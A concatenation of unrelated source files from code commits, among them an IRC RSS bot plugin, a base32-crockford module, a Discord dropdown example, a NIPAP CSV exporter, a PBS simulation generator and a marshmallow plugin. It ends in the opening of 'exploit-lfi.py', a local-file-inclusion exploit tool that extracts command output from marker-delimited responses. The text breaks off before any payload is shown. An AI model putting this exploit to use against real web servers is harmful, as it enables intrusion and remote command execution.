            self.chanmsg('Usage: !rss <add|remove|list|refresh> [...]')
            return
        if pieces[0].strip() in \
            ('add', 'remove', 'latest', 'refresh', 'list', 'addfilter',
            'removefilter'):
            mname = 'do_' + pieces[0].strip()
            params = ''
            if len(pieces) >= 2:
                params = pieces[1].strip()
            if hasattr(self, mname):
                getattr(self, mname)(user, params)

    def do_add(self, user, params):
        """!rss add <name> <url> [interval] - register and start a feed."""
        pieces = params.split()
        if len(pieces) < 2:
            self.chanmsg('Usage !rss add <name> <url>')
            return
        feed, url = pieces[0:2]
        # Default poll interval (seconds); user value is clamped to >= 120.
        interval = 180
        if len(pieces) == 3:
            interval = int(pieces[2])
            if interval < 120:
                interval = 120
        if feed in self.config['feeds']:
            self.chanmsg('Feed already exists: %s' % feed)
            return
        self.items[feed] = []
        self.config['feeds'][feed] = {
            'url': url,
            'interval': interval,
            }
        self.save()
        self.chanmsg('Feed %s successfully added' % feed)
        self.query_feed(feed)

    def do_addfilter(self, user, params):
        """!rss addfilter <feed> <string> - only announce matching items."""
        pieces = params.split(' ', 1)
        if len(pieces) != 2:
            self.chanmsg('Usage !rss addfilter <feed> <string>')
            return
        feed, filter = pieces
        if feed not in self.config['feeds']:
            self.chanmsg('No such feed found')
            return
        self.config['feeds'][feed]['filter'] = filter
        self.save()
        self.chanmsg('Filter added for %s' % feed)

    def do_removefilter(self, user, feed):
        """!rss removefilter <feed> - drop the feed's announce filter."""
        if feed not in self.config['feeds']:
            self.chanmsg('No such feed found')
            return
        if 'filter' in self.config['feeds'][feed]:
            del self.config['feeds'][feed]['filter']
            self.save()
        self.chanmsg('Filter removed from %s' % feed)

    def do_remove(self, user, feed):
        """!rss remove <feed> - cancel polling and forget the feed."""
        if not feed:
            self.chanmsg('Usage !rss remove <feed>')
            return
        if feed not in self.config['feeds']:
            self.chanmsg('Feed not found: %s' % feed)
        # Cancel the pending poll timer, if any, before dropping config.
        if 'feed_%s' % feed in self.scheduled:
            self.scheduled['feed_%s' % feed].cancel()
            del self.scheduled['feed_%s' % feed]
        del self.config['feeds'][feed]
        self.save()
        self.chanmsg('Feed %s successfully removed' % feed)

    def do_list(self, user, params):
        """!rss list - show every feed as name(interval)[url]{filter}."""
        if not len(self.config['feeds']):
            self.chanmsg('No feeds found')
            return
        l = []
        for feed in self.config['feeds']:
            filter = ''
            if 'filter' in self.config['feeds'][feed]:
                filter = '{%s}' % self.config['feeds'][feed]['filter']
            l.append('%s(%s)[%s]%s' % \
                (feed,
                self.config['feeds'][feed]['interval'],
                self.config['feeds'][feed]['url'],
                filter))
        self.chanmsg(' '.join(l))

    def do_latest(self, user, feed):
        """!rss latest <name> - announce up to 3 stored items of the feed."""
        if not feed:
            self.chanmsg('Usage: !rss latest <name>')
            return
        if feed not in self.config['feeds']:
            self.chanmsg('No such feed found')
            return
        if feed not in self.items:
            self.chanmsg('No items found')
            return
        count = 0
        for item in self.items[feed]:
            self.chanmsg('%s %s' % (str(item['title']), str(item['link'])))
            count += 1
            if count == 3:
                break

    def do_refresh(self, user, feed):
        """!rss refresh <name> - cancel the timer and poll immediately."""
        if not feed:
            self.chanmsg('Usage: !rss refresh <name>')
            return
        if feed not in self.config['feeds']:
            self.chanmsg('No such feed found')
            return
        if 'feed_%s' % feed in self.scheduled:
            self.scheduled['feed_%s' % feed].cancel()
            del self.scheduled['feed_%s' % feed]
        self.query_feed(feed)

    @inlineCallbacks
    def query_feed(self, feed):
        """Fetch one feed, announce unseen items, reschedule the next poll.

        Always re-arms the poll timer, including on fetch or parse failure.
        """
        url = self.config['feeds'][feed]['url']
        interval = self.config['feeds'][feed]['interval']
        filter = None
        if 'filter' in self.config['feeds'][feed]:
            filter = self.config['feeds'][feed]['filter']
        try:
            data = yield client.getPage(url)
        except:
            self.log('I failed at checking %s' % feed)
            self.scheduled['feed_%s' % feed] = \
                reactor.callLater(interval, self.query_feed, feed)
            return
        try:
            dom = minidom.parseString(data)
        except:
            self.log('XML parse failed (%s)' % feed)
            self.scheduled['feed_%s' % feed] = \
                reactor.callLater(interval, self.query_feed, feed)
            return
        # First pass for this feed: store items silently, no announcements.
        first = False
        if not len(self.items[feed]):
            first = True
        items = dom.getElementsByTagName('item')
        for item in items:
            titleorig = item.getElementsByTagName(
                'title')[0].childNodes[0].nodeValue.encode('UTF-8')
            # Prefer Latin-1 for IRC output; fall back to raw UTF-8 bytes.
            try:
                title = titleorig.decode('UTF-8').encode('ISO-8859-1')
            except:
                title = titleorig
            link = item.getElementsByTagName(
                'link')[0].childNodes
            if len(link):
                link = link[0].nodeValue
            else:
                link = ''
            link = self.bot.factory.web.urlstorage.addURL(link)
            description = item.getElementsByTagName('description')
            if description:
                description = description[0].childNodes[0].nodeValue
            else:
                description = ''
            guid = item.getElementsByTagName('guid')
            if guid:
                guid = guid[0].childNodes[0].nodeValue
            else:
                # No <guid> element: derive a stable id from the title.
                guid = md5.md5(title).hexdigest()
            if filter and not (title.lower().count(filter.lower()) or \
                description.count(filter.lower())):
                continue
            if guid not in [x['guid'] for x in self.items[feed]]:
                # Yes, we now keep every item we've ever seen (in this session)
                # to prevent excess flood when certain rss feeds (devblog)
                # fuck up
                self.items[feed].append({
                    'guid': guid,
                    'title': title,
                    'link': link,
                    'found': time.time(),
                    })
                if not first:
                    self.log('I would like to announce on %s: %s' % \
                        (feed, guid))
                    self.chanmsg('[%s] %s %s' % (feed, str(title), str(link)))
        self.scheduled['feed_%s' % feed] = \
            reactor.callLater(interval, self.query_feed, feed)
# vim: set et sw=4:
| Python | 0.000001 | |
97eabd4e33086c66372b0e15dd1eeda12e99f427 | Create createfile.py | createfile.py | createfile.py | import os
#creates file on the go on the entries of a tuple
ports=[20,21,23,25,43,49,53,69,70,79,80,109,110,115,137,139,143,161,194,389,443,444,458,546,547,1080]
path=raw_input('Enter the path you want to create the files: ')
try:
os.chdir(path)
except:
print "Invalid Path"
try:
for i in ports:
for i in ports:
file = open('./'+str(i),'w')
file.close()
except:
print "Could not create files, please check if you have the appropriate read/write permissions
| Python | 0.000004 | |
6d50dc3c266f4a1b7f517935b961cfb20602011b | add benchmark.py | suite/benchmark.py | suite/benchmark.py | #!/usr/bin/python
# Simple benchmark for Capstone by disassembling random code. By Nguyen Anh Quynh, 2014
from capstone import *
from time import time
from random import randint
def random_str(size):
    """Return *size* random byte values as a string for the disassembler.

    The previous implementation joined decimal digit strings (e.g. "137"),
    so the result was ASCII text of unpredictable length rather than *size*
    random machine-code bytes; chr() yields exactly one character per byte.
    """
    return "".join(chr(randint(0, 255)) for _ in range(size))
def cs(md, data):
    """Disassemble *data* with Capstone handle *md*, consuming all insns.

    The address check never matches (disasm starts at 0 over 128 bytes);
    it only forces full iteration so the benchmark measures decoding.
    """
    insns = md.disasm(data, 0)
    # uncomment below line to speed up this function 200 times!
    # return
    for i in insns:
        if i.address == 0x100000:
            print i
md = Cs(CS_ARCH_X86, CS_MODE_32)
# Detail mode off: skip operand/register decoding for raw decode speed.
md.detail = False

# warm up few times
for i in xrange(3):
    data = random_str(128)
    cs(md, data)

# start real benchmark: time only the disassembly calls, not the
# random-input generation.
c_t = 0
for i in xrange(10000):
    code = random_str(128)

    t1 = time()
    cs(md, code)
    c_t += time() - t1

print "Capstone:", c_t, "seconds"
| Python | 0.000003 | |
95c0d34be2699ee85d23a32384d408ac25561978 | Normalize to str to work around Unicode for now | base32_crockford.py | base32_crockford.py | """
base32-crockford
================
A Python module implementing the alternate base32 encoding as described
by Douglas Crockford at: http://www.crockford.com/wrmg/base32.html.
According to his description, the encoding is designed to:
* Be human and machine readable
* Be compact
* Be error resistant
* Be pronounceable
It uses a symbol set of 10 digits and 22 letters, excluding I, L O and
U. Decoding is not case sensitive, and 'i' and 'l' are converted to '1'
and 'o' is converted to '0'. Encoding uses only upper-case characters.
Hyphens can be present in symbol strings to improve readability, and
are removed when decoding.
A check symbol can be appended to a symbol string to detect errors
within the string.
"""
import string
__all__ = ["encode", "decode", "normalize"]
# The encoded symbol space does not include I, L, O or U;
# the last five symbols are exclusively for checksum values
# 32 data symbols plus 5 extra symbols (*~$=U) used only for check digits.
SYMBOLS = "0123456789ABCDEFGHJKMNPQRSTVWXYZ*~$=U"
ENCODE_SYMBOLS = {i: ch for (i, ch) in enumerate(SYMBOLS)}
DECODE_SYMBOLS = {ch: i for (i, ch) in enumerate(SYMBOLS)}
# Python-2 string.maketrans table: I/i/L/l -> 1, O/o -> 0.
NORMALIZE_SYMBOLS = string.maketrans("IiLlOo", "111100")
BASE = 32
# 37 is prime, so the mod-37 check symbol catches transpositions too.
CHECK_BASE = 37
def encode(number, checksum=False):
    """
    Encodes a base 10 positive integer into a symbol string.
    Raises a ValueError on invalid input.

    If checksum is set to True, a check symbol will also be
    calculated and appended to the string.
    """
    number = int(number)
    if number < 0:
        raise ValueError("Number '%d' is not a positive integer" % number)

    check_symbol = ENCODE_SYMBOLS[number % CHECK_BASE] if checksum else ''

    if number == 0:
        return '0' + check_symbol

    # Collect base-32 digits least-significant first, then reverse.
    digits = []
    while number > 0:
        number, remainder = divmod(number, BASE)
        digits.append(ENCODE_SYMBOLS[remainder])
    return ''.join(reversed(digits)) + check_symbol
def decode(symbol_string, checksum=False, strict=False):
    """
    Decodes a given symbol string into a base 10 number.
    Raises a ValueError on invalid input.

    If checksum is set to True, the string is assumed to have a
    trailing check symbol which will be validated. If the
    checksum validation fails, a ValueError is raised.

    If strict is set to True, a ValueError is raised if the
    normalization step requires changes to the string.
    """
    symbol_string = normalize(symbol_string, strict=strict)
    if checksum:
        # Split off the trailing check symbol before decoding the payload.
        symbol_string, check_symbol = symbol_string[:-1], symbol_string[-1]

    # The letter 'U' is only valid as a check symbol
    if 'U' in symbol_string:
        raise ValueError("String '%s' contains invalid characters" %
                         symbol_string)

    # Horner's-rule accumulation of base-32 digits.
    number = 0
    for symbol in symbol_string:
        number = number * BASE + DECODE_SYMBOLS[symbol]

    if checksum:
        check_value = DECODE_SYMBOLS[check_symbol]
        modulo = number % CHECK_BASE
        if check_value != modulo:
            raise ValueError("Invalid check symbol '%s' for string '%s'" %
                             (check_symbol, symbol_string))

    return number
def normalize(symbol_string, strict=False):
    """
    Normalizes a given symbol string to account for error
    resistance and prepare it for decoding. These transformations
    are applied:

       1. Hyphens are removed
       2. 'I', 'i', 'L' or 'l' are converted to '1'
       3. 'O' or 'o' are converted to '0'
       4. All characters are converted to uppercase

    If the strict parameter is set to True, a ValueError is raised
    if any of the above transformations are applied.
    """
    # Renamed from 'string': the original local shadowed the imported
    # 'string' module used for NORMALIZE_SYMBOLS at module scope.
    normalized = str(symbol_string).translate(NORMALIZE_SYMBOLS, '-').upper()
    if strict and normalized != symbol_string:
        raise ValueError("Normalization required for string '%s'" %
                         symbol_string)
    return normalized
| """
base32-crockford
================
A Python module implementing the alternate base32 encoding as described
by Douglas Crockford at: http://www.crockford.com/wrmg/base32.html.
According to his description, the encoding is designed to:
* Be human and machine readable
* Be compact
* Be error resistant
* Be pronounceable
It uses a symbol set of 10 digits and 22 letters, excluding I, L O and
U. Decoding is not case sensitive, and 'i' and 'l' are converted to '1'
and 'o' is converted to '0'. Encoding uses only upper-case characters.
Hyphens can be present in symbol strings to improve readability, and
are removed when decoding.
A check symbol can be appended to a symbol string to detect errors
within the string.
"""
import string
__all__ = ["encode", "decode", "normalize"]
# The encoded symbol space does not include I, L, O or U;
# the last five symbols are exclusively for checksum values
# 32 data symbols plus 5 extra symbols (*~$=U) used only for check digits.
SYMBOLS = "0123456789ABCDEFGHJKMNPQRSTVWXYZ*~$=U"
ENCODE_SYMBOLS = {i: ch for (i, ch) in enumerate(SYMBOLS)}
DECODE_SYMBOLS = {ch: i for (i, ch) in enumerate(SYMBOLS)}
# Python-2 string.maketrans table: I/i/L/l -> 1, O/o -> 0.
NORMALIZE_SYMBOLS = string.maketrans("IiLlOo", "111100")
BASE = 32
# 37 is prime, so the mod-37 check symbol catches transpositions too.
CHECK_BASE = 37
def encode(number, checksum=False):
    """
    Encodes a base 10 positive integer into a symbol string.
    Raises a ValueError on invalid input.

    If checksum is set to True, a check symbol will also be
    calculated and appended to the string.
    """
    number = int(number)
    if number < 0:
        raise ValueError("Number '%d' is not a positive integer" % number)

    check_symbol = ''
    if checksum:
        # mod-37 check digit computed over the full value.
        check_symbol = ENCODE_SYMBOLS[number % CHECK_BASE]

    if number == 0:
        return '0' + check_symbol

    # Emit base-32 digits most-significant first by prepending.
    symbol_string = ''
    while number > 0:
        remainder = number % BASE
        number //= BASE
        symbol_string = ENCODE_SYMBOLS[remainder] + symbol_string

    return symbol_string + check_symbol
def decode(symbol_string, checksum=False, strict=False):
    """
    Decodes a given symbol string into a base 10 number.
    Raises a ValueError on invalid input.

    If checksum is set to True, the string is assumed to have a
    trailing check symbol which will be validated. If the
    checksum validation fails, a ValueError is raised.

    If strict is set to True, a ValueError is raised if the
    normalization step requires changes to the string.
    """
    symbol_string = normalize(symbol_string, strict=strict)
    if checksum:
        # Split off the trailing check symbol before decoding the payload.
        symbol_string, check_symbol = symbol_string[:-1], symbol_string[-1]

    # The letter 'U' is only valid as a check symbol
    if 'U' in symbol_string:
        raise ValueError("String '%s' contains invalid characters" %
                         symbol_string)

    # Horner's-rule accumulation of base-32 digits.
    number = 0
    for symbol in symbol_string:
        number = number * BASE + DECODE_SYMBOLS[symbol]

    if checksum:
        check_value = DECODE_SYMBOLS[check_symbol]
        modulo = number % CHECK_BASE
        if check_value != modulo:
            raise ValueError("Invalid check symbol '%s' for string '%s'" %
                             (check_symbol, symbol_string))

    return number
def normalize(symbol_string, strict=False):
    """
    Normalizes a given symbol string to account for error
    resistance and prepare it for decoding. These transformations
    are applied:

       1. Hyphens are removed
       2. 'I', 'i', 'L' or 'l' are converted to '1'
       3. 'O' or 'o' are converted to '0'
       4. All characters are converted to uppercase

    If the strict parameter is set to True, a ValueError is raised
    if any of the above transformations are applied.
    """
    # str() coercion works around non-str (e.g. unicode/int) input, matching
    # the other copy of this module; also renamed the local, which shadowed
    # the imported 'string' module.
    normalized = str(symbol_string).translate(NORMALIZE_SYMBOLS, '-').upper()
    if strict and normalized != symbol_string:
        raise ValueError("Normalization required for string '%s'" %
                         symbol_string)
    return normalized
| Python | 0 |
78aea51f508a14bb1b03b49933576c84b56a7459 | Add an example for the new dropdowns | examples/views/dropdown.py | examples/views/dropdown.py | import typing
import discord
from discord.ext import commands
# Defines a custom Select containing colour options
# that the user can choose. The callback function
# of this class is called when the user changes their choice
class Dropdown(discord.ui.Select):
    """A single-choice colour select menu for the example bot."""

    def __init__(self):

        # Set the options that will be presented inside the dropdown
        options = [
            discord.SelectOption(label='Red', description='Your favourite colour is red', emoji='🟥'),
            discord.SelectOption(label='Green', description='Your favourite colour is green', emoji='🟩'),
            discord.SelectOption(label='Blue', description='Your favourite colour is blue', emoji='🟦')
        ]

        # The placeholder is what will be shown when no option is chosen
        # The min and max values indicate we can only pick one of the three options
        # The options parameter defines the dropdown options. We defined this above
        super().__init__(placeholder='Choose your favourite colour...', min_values=1, max_values=1, options=options)

    async def callback(self, interaction: discord.Interaction):
        # Use the interaction object to send a response message containing
        # the user's favourite colour or choice. The self object refers to the
        # Select object, and the values attribute gets a list of the user's
        # selected options. We only want the first one.
        await interaction.response.send_message(f'Your favourite colour is {self.values[0]}')
class DropdownView(discord.ui.View):
    """A view whose only component is the colour Dropdown above."""

    def __init__(self):
        super().__init__()

        # Adds the dropdown to our view object.
        self.add_item(Dropdown())
class Bot(commands.Bot):
    """Example bot answering to '$' prefix or a direct mention."""

    def __init__(self):
        super().__init__(command_prefix=commands.when_mentioned_or('$'))

    async def on_ready(self):
        # Startup banner logged once the gateway connection is established.
        print(f'Logged in as {self.user} (ID: {self.user.id})')
        print('------')
bot = Bot()
@bot.command()
async def colour(ctx):
"""Sends a message with our dropdown containing colours"""
# Create the view containing our dropdown
view = DropdownView()
# Sending a message containing our view
await ctx.send('Pick your favourite colour:', view=view)
bot.run('token')
| Python | 0.000003 | |
bcb6c0780aacf77069a08f8d5b44d295881d9b9d | Create solution to swap odd even characters | swapOddEvenChar.py | swapOddEvenChar.py | #Python3
# Swap each adjacent pair of characters; a trailing odd character stays put.
chars = list(input().strip())
limit = len(chars) - 1
idx = 0
while idx < limit:
    chars[idx], chars[idx + 1] = chars[idx + 1], chars[idx]
    idx += 2
print(''.join(chars))
7bde47d48f4e80b4449049a8b05767b30eb2c516 | Add stupid CSV export example | utilities/export-csv.py | utilities/export-csv.py | #!/usr/bin/python
import os
import csv
import sys
sys.path.append('../pynipap')
import pynipap
class Export:
    """Dump every prefix of a NIPAP schema to a CSV file."""

    def __init__(self, xmlrpc_uri):
        self.xmlrpc_uri = xmlrpc_uri

    def write(self, output_file, schema_name):
        """Write all prefixes of *schema_name* to *output_file* as CSV.

        Exits the process with status 1 on connection/authentication
        failure or when the schema does not exist.
        """
        # Fixed: use the URI given to the constructor instead of relying on
        # a module-global 'xmlrpc_uri' that only exists when run as a script.
        pynipap.xmlrpc_uri = self.xmlrpc_uri
        # AuthOptions registers itself globally inside pynipap; the
        # return value is not needed.
        pynipap.AuthOptions({ 'authoritative_source': 'nipap' })

        import socket,xmlrpclib
        try:
            schema = pynipap.Schema.list({ 'name': schema_name })[0]
        except socket.error:
            print >> sys.stderr, "Connection refused, please check hostname & port"
            sys.exit(1)
        except xmlrpclib.ProtocolError:
            print >> sys.stderr, "Authentication failed, please check your username / password"
            sys.exit(1)
        except IndexError:
            print >> sys.stderr, "Non existing schema (", schema_name, ")"
            sys.exit(1)

        res = pynipap.Prefix.smart_search(schema, ' ', { 'include_all_parents': True })
        # 'with' closes the file even if a row fails to serialize.
        with open(output_file, "w+") as f:
            writer = csv.writer(f, quoting=csv.QUOTE_MINIMAL)
            for p in res['result']:
                writer.writerow([p.display_prefix, p.type, p.node, p.order_id, p.description])
if __name__ == '__main__':
    import optparse
    parser = optparse.OptionParser()
    parser.add_option('--username', default='', help="Username")
    parser.add_option('--password', default='', help="Password")
    parser.add_option('--host', help="NIPAP backend host")
    parser.add_option('--port', default=1337, help="NIPAP backend port")
    parser.add_option('--schema', help="Schema name")
    parser.add_option('--file', help="Output file")

    (options, args) = parser.parse_args()

    # --host, --schema and --file are mandatory; bail out early otherwise.
    if options.host is None:
        print >> sys.stderr, "Please specify the NIPAP backend host to work with"
        sys.exit(1)

    if options.schema is None:
        print >> sys.stderr, "Please specify a schema to export"
        sys.exit(1)

    if options.file is None:
        print >> sys.stderr, "Please specify an output file"
        sys.exit(1)

    # Embed optional credentials in the URI: http://user:pass@host:port
    auth_uri = ''
    if options.username:
        auth_uri = "%s:%s@" % (options.username, options.password)

    xmlrpc_uri = "http://%(auth_uri)s%(host)s:%(port)s" % {
            'auth_uri'  : auth_uri,
            'host'      : options.host,
            'port'      : options.port
            }
    wr = Export(xmlrpc_uri)
    wr.write(options.file, options.schema)
| Python | 0 | |
9b6eddb88f5de1b7c44d42e1d4a3dc1c90180862 | Implement deck. | onirim/deck.py | onirim/deck.py | import random
class Deck:
def __init__(self, cards):
self._undrawn = list(cards)
self._discarded = []
self._limbo = []
def draw(self, n=1):
"""Draw n cards."""
if n > len(self._undrawn) or n < 0:
raise ValueError()
drawn, self._undrawn = self._undrawn[:n], self._undrawn[n:]
return drawn
def put_discard(self, card):
"""Put a card to discard pile."""
self._discarded.append(card)
def put_limbo(self, card):
"""Put a card to Limbo pile."""
self._limbo.append(card)
def shuffle(self):
"""Shuffle the undrawn pile."""
random.shuffle(self._undrawn)
def shuffle_with_limbo(self):
"""Shuffle limbo pile back to undrawn pile."""
self._undrawn += self._limbo
self._limbo = []
random.shuffle(self._undrawn)
| Python | 0 | |
f5711401b79433f5b52e675cec67b63f6511836a | add tests file | tests.py | tests.py | #!flask/bin/python
import unittest
from server import app
def add(a, b):
    """Return the sum of *a* and *b*."""
    total = a + b
    return total
class TestCase(unittest.TestCase):
    """Minimal Flask test-client scaffold for the server app."""

    def setUp(self):
        # TESTING mode makes Flask propagate exceptions instead of
        # rendering 500 pages, which keeps failures visible in tests.
        app.config['TESTING'] = True
        self.app = app.test_client()

    def tearDown(self):
        pass

    def test_add(self):
        self.assertEqual(add(1, 2), 3)
        self.assertEqual(add(3, 4), 7)
self.assertEqual(add(3, 4), 7)
# Run the suite directly with `python tests.py`.
if __name__ == '__main__':
    unittest.main()
d6c310043db9862dd49d35de6bea67e120e997c7 | Add file to generate a series of interfaces | simulations/interface.py | simulations/interface.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2017 Malcolm Ramsay <malramsay64@gmail.com>
#
# Distributed under terms of the MIT license.
"""Set running a series of simulations."""
import itertools
import os
import subprocess
from pathlib import Path
create_file = """#!/usr/bin/env python
#PBS -N create_interface
#PBS -m abe
#PBS -M malramsay64+quartz@gmail
#PBS -j oe
#PBS -o {outdir}/pbs.log
#PBS -l select=1:ncpus={ncpus}
#PBS -l walltime=500:00:00
#PBS -l cput=3600:00:00
#PBS -V
{array_flag}
import subprocess
import os
from pathlib import Path
def create_fname(mol, temp, pressure, mom_I, crys):
return mol + '-P' + pressure + '-T' + temp + '-I' + mom_I + '-' + crys + '.gsd'
all_values = {values}
job_index = int(os.environ.get('PBS_ARRAY_INDEX', 0))
temperature, pressure, moment_inertia, crystal = all_values[job_index]
temperature = '{{:.2f}}'.format(temperature)
pressure = '{{:.2f}}'.format(pressure)
moment_inertia = '{{:.2f}}'.format(moment_inertia)
ncpus = {ncpus}
common_opts = [
'--pressure', pressure,
'--temperature', temperature,
'--moment-inertia-scale', moment_inertia,
'--space-group', crystal,
'--output', '{outdir}',
]
run_comand = ['sdrun']
if ncpus > 1:
run_comand = [
'mpirun',
'--np', str(ncpus/2),
] + run_comand
init_temp = '0.39'
create_out = '{outdir}/' + create_fname('Trimer', init_temp, pressure, moment_inertia, crystal)
create_opts = [
'--space-group', crystal,
'--steps', '1000',
'--temperature', init_temp,
'--lattice-lengths', '48', '42',
create_out,
]
if not Path(create_out).exists():
print(' '.join(run_comand + ['create'] + common_opts + create_opts))
return_code = subprocess.call(run_comand + ['create'] + common_opts + create_opts)
assert return_code == 0
melt_out = '{outdir}/' + create_fname('Trimer', '{create_temp}', pressure, moment_inertia, crystal)
melt_opts = [
'--space-group', crystal,
'--steps', '{create_steps}',
'--equil-type', 'interface',
'--temperature', '{create_temp}',
create_out,
melt_out,
]
if not Path(melt_out).exists():
print(' '.join(run_comand + ['equil'] + common_opts + melt_opts))
return_code = subprocess.call(run_comand + ['equil'] + common_opts + melt_opts)
assert return_code == 0
"""
pbs_file = """#!/usr/bin/env python
#PBS -N interface_production
#PBS -m abe
#PBS -M malramsay64+quartz@gmail
#PBS -j oe
#PBS -o {outdir}/pbs.log
#PBS -l select=1:ncpus={ncpus}
#PBS -l walltime=500:00:00
#PBS -l cput=3600:00:00
#PBS -V
{array_flag}
import subprocess
import os
from pathlib import Path
def create_fname(mol, temp, pressure, mom_I, crys):
return mol + '-P' + pressure + '-T' + temp + '-I' + mom_I + '-' + crys + '.gsd'
all_values = {values}
job_index = int(os.environ.get('PBS_ARRAY_INDEX', 0))
temperature, pressure, moment_inertia, crystal = all_values[job_index]
temperature = '{{:.2f}}'.format(temperature)
pressure = '{{:.2f}}'.format(pressure)
moment_inertia = '{{:.2f}}'.format(moment_inertia)
ncpus = {ncpus}
common_opts = [
'--pressure', pressure,
'--temperature', temperature,
'--moment-inertia-scale', moment_inertia,
'--space-group', crystal,
'--output', '{outdir}',
]
run_comand = ['sdrun']
if ncpus > 1:
run_comand = [
'mpirun',
'--np', str(ncpus),
] + run_comand
create_out = '{outdir}/' + create_fname('Trimer', '{create_temp}', pressure, moment_inertia, crystal)
equil_out = '{outdir}/' + create_fname('Trimer', temperature, pressure, moment_inertia, crystal)
equil_opts = [
'--equil-type', 'interface',
'--init-temp', '{create_temp}',
'--steps', '{equil_steps}',
create_out,
equil_out,
]
subprocess.call(run_comand + ['equil'] + common_opts + equil_opts)
prod_opts = [
'--steps', '{prod_steps}',
'--no-dynamics',
equil_out,
]
subprocess.call(run_comand + ['prod'] + common_opts + prod_opts)
"""
# Parameter sweep: temperatures x pressures x moment-of-inertia scales x
# crystal space groups; every combination becomes one PBS array job.
temperatures = [0.3, 0.35, 0.4, 0.45, 0.5, 0.6, 0.8, 1.0, 1.5]
pressures = [1.]
mom_inertia = [1., 10., 100., 1000.]
crystals = ['p2', 'pg', 'p2gg']
# All generated configurations and logs land here.
outdir = Path.home() / 'tmp1m/2017-10-18-interface'
if __name__ == "__main__":
    # ensure outdir exists
    outdir.mkdir(exist_ok=True)

    all_values = list(itertools.product(temperatures, pressures, mom_inertia, crystals))
    create_temp = 1.80
    create_values = list(itertools.product([create_temp], pressures, mom_inertia, crystals))

    def get_array_flag(num_values: int) -> str:
        """Return a PBS job-array directive, or '' for a single job."""
        if num_values == 1:
            return ''
        else:
            return f'#PBS -J 0-{num_values-1}'

    create_pbs = create_file.format(
        values=create_values,
        create_temp=create_temp,
        array_flag=get_array_flag(len(create_values)),
        outdir=outdir,
        create_steps=100_000,
        ncpus=8,
    )
    prod_pbs = pbs_file.format(
        values=all_values,
        array_flag=get_array_flag(len(all_values)),
        outdir=outdir,
        create_temp=create_temp,
        equil_steps=1_000_000,
        prod_steps=100_000_000,
        ncpus=8,
    )
    # Submit the creation job and capture its id for the dependency below.
    create_process = subprocess.run(
        ['qsub'],
        input=create_pbs,
        encoding='utf-8',
        stdout=subprocess.PIPE,
    )
    # qsub prints the job id with a trailing newline; strip it so the
    # depend=afterok: attribute is not corrupted.
    job_id = create_process.stdout.strip()
    print(job_id)
    # Production jobs only start once the creation job exits successfully.
    subprocess.run(['qsub', '-W', 'depend=afterok:'+job_id],
                   input=prod_pbs,
                   encoding='utf-8',
                   env=os.environ,
                   )
    # Keep a copy of the generated job scripts next to the results.
    with open(outdir / 'create_pbs.py', 'w') as tf:
        tf.write(create_pbs)
    with open(outdir / 'prod_pbs.py', 'w') as tf:
        tf.write(prod_pbs)
| Python | 0 | |
e9d87a087a0f0102157d7c718a048c72f655c54a | Store registered refs as plugin metadata | smore/ext/marshmallow.py | smore/ext/marshmallow.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from marshmallow.compat import iteritems
from marshmallow import class_registry
from smore import swagger
from smore.apispec.core import Path
from smore.apispec.utils import load_operations_from_docstring
def schema_definition_helper(spec, name, schema, **kwargs):
    """Definition helper that allows using a marshmallow
    :class:`Schema <marshmallow.Schema>` to provide Swagger
    metadata.

    :param spec: the APISpec instance registering this definition.
    :param str name: name the definition is registered under.
    :param type schema: A marshmallow Schema class.
    """
    # Store registered refs, keyed by Schema class
    plug = spec.plugins['smore.ext.marshmallow']
    if 'refs' not in plug:
        plug['refs'] = {}
    plug['refs'][schema] = name
    return swagger.schema2jsonschema(schema)
def schema_path_helper(view, **kwargs):
    """Path helper that builds swagger operations from a view docstring.

    Docstring entries carrying a ``schema`` key get the named marshmallow
    Schema rendered as their 200 response.  Returns None when the
    docstring declares no operations.
    """
    doc_operations = load_operations_from_docstring(view.__doc__)
    if not doc_operations:
        return
    operations = doc_operations.copy()
    for method, config in iteritems(doc_operations):
        if 'schema' in config:
            # Resolve the schema class registered under this name.
            schema_cls = class_registry.get_class(config['schema'])
            if not operations[method].get('responses'):
                operations[method]['responses'] = {}
            operations[method]['responses']['200'] = swagger.schema2jsonschema(schema_cls)
    return Path(operations=operations)
def setup(spec):
    """Register this extension's definition and path helpers on *spec*."""
    spec.register_definition_helper(schema_definition_helper)
    spec.register_path_helper(schema_path_helper)
| # -*- coding: utf-8 -*-
from __future__ import absolute_import
from marshmallow.compat import iteritems
from marshmallow import class_registry
from smore import swagger
from smore.apispec.core import Path
from smore.apispec.utils import load_operations_from_docstring
def schema_definition_helper(name, schema, **kwargs):
    """Definition helper that allows using a marshmallow
    :class:`Schema <marshmallow.Schema>` to provide Swagger
    metadata.

    :param str name: name the definition is registered under.
    :param type schema: A marshmallow Schema class.
    """
    return swagger.schema2jsonschema(schema)
def schema_path_helper(view, **kwargs):
    """Path helper that builds swagger operations from a view docstring.

    Docstring entries carrying a ``schema`` key get the named marshmallow
    Schema rendered as their 200 response.  Returns None when the
    docstring declares no operations.
    """
    doc_operations = load_operations_from_docstring(view.__doc__)
    if not doc_operations:
        return
    operations = doc_operations.copy()
    for method, config in iteritems(doc_operations):
        if 'schema' in config:
            # Resolve the schema class registered under this name.
            schema_cls = class_registry.get_class(config['schema'])
            if not operations[method].get('responses'):
                operations[method]['responses'] = {}
            operations[method]['responses']['200'] = swagger.schema2jsonschema(schema_cls)
    return Path(operations=operations)
def setup(spec):
    """Register this extension's definition and path helpers on *spec*."""
    spec.register_definition_helper(schema_definition_helper)
    spec.register_path_helper(schema_path_helper)
| Python | 0 |
e4734cb85458475ad4fd2cf66db456b7924d6fe0 | Add : LFI Exploit tool | exploit-lfi.py | exploit-lfi.py | #!/usr/bin/python
import argparse
import base64
import re
import requests
import sys
def scrap_results (content):
    """Extract the command output enclosed between the STARTSTART and
    ENDEND markers of a fetched page, one non-empty line per entry."""
    start_marker = re.compile('.*STARTSTART.*')
    end_marker = re.compile('.*ENDEND.*')

    collected = list()
    seen_start = False
    seen_end = False

    for line in content.split('\n'):
        # Both markers consumed on previous lines: nothing left to gather.
        if seen_start and seen_end:
            break
        if not seen_start and start_marker.findall(line):
            # Drop everything up to and including the start marker.
            line = re.sub('.*STARTSTART', '', line)
            seen_start = True
        if seen_start and not seen_end and end_marker.findall(line):
            # Drop the end marker and everything after it.
            line = re.sub('ENDEND.*', '', line)
            seen_end = True
        if seen_start and len(line) != 0:
            collected.append(line)

    return collected
# extract all potential base64 strings
# decode correct one and store potentials
def scrap_b64str (content):
